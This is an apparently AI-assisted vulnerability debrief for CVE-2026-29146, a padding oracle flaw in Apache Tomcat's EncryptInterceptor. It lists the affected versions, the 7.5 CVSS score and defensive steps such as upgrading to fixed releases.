PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-29146 Apache CVE debrief

CVE-2026-29146 is a Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration. This issue affects Apache Tomcat versions from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, and from 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11.0.19, 10.1.53, and 9.0.116, which fixes the issue. The CVSS score for this vulnerability is 7.5, indicating a high severity. The vulnerability was published on April 9, 2026, and last modified on June 30, 2026.

Vendor
Apache
Product
Tomcat
CVSS
HIGH 7.5
CISA KEV
Not listed in stored evidence
Original CVE published
2026-04-09
Original CVE updated
2026-06-30
Advisory published
2026-04-09
Advisory updated
2026-06-30

Who should care

Apache Tomcat users and administrators should be aware of this vulnerability and take necessary actions to upgrade to a fixed version. This vulnerability can be exploited over the network, and its high severity score indicates that it could have significant impacts on affected systems. Security teams and IT professionals responsible for maintaining Apache Tomcat installations should prioritize patching.

Technical summary

The CVE-2026-29146 vulnerability is a Padding Oracle attack in Apache Tomcat's EncryptInterceptor. It occurs when using the default configuration. The affected versions of Apache Tomcat are from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, and from 7.0.100 through 7.0.109. The vulnerability's CVSS vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, indicating that it can be exploited over the network with low attack complexity and no privileges required. The vulnerability allows for high confidentiality impacts but does not affect integrity or availability.

Defensive priority

High priority should be given to patching Apache Tomcat installations to address the CVE-2026-29146 vulnerability. Given the high CVSS score and the potential for network exploitation, defenders should treat this as a critical update.

Recommended defensive actions

  • Upgrade Apache Tomcat to version 11.0.19, 10.1.53, or 9.0.116.
  • Review and update affected versions of Apache Tomcat according to the vendor's advisory.
  • Implement compensating controls such as network segmentation and monitoring for suspicious activity.
  • Verify that the EncryptInterceptor is properly configured.
  • Monitor for and respond to potential exploit attempts.

Evidence notes

The CVE-2026-29146 vulnerability was published on April 9, 2026, and last modified on June 30, 2026. The CVSS score is 7.5, indicating high severity. The vulnerability affects multiple versions of Apache Tomcat and can be exploited over the network. Users are recommended to upgrade to fixed versions of Apache Tomcat.

Official resources

This article is AI-assisted and based on the supplied source corpus.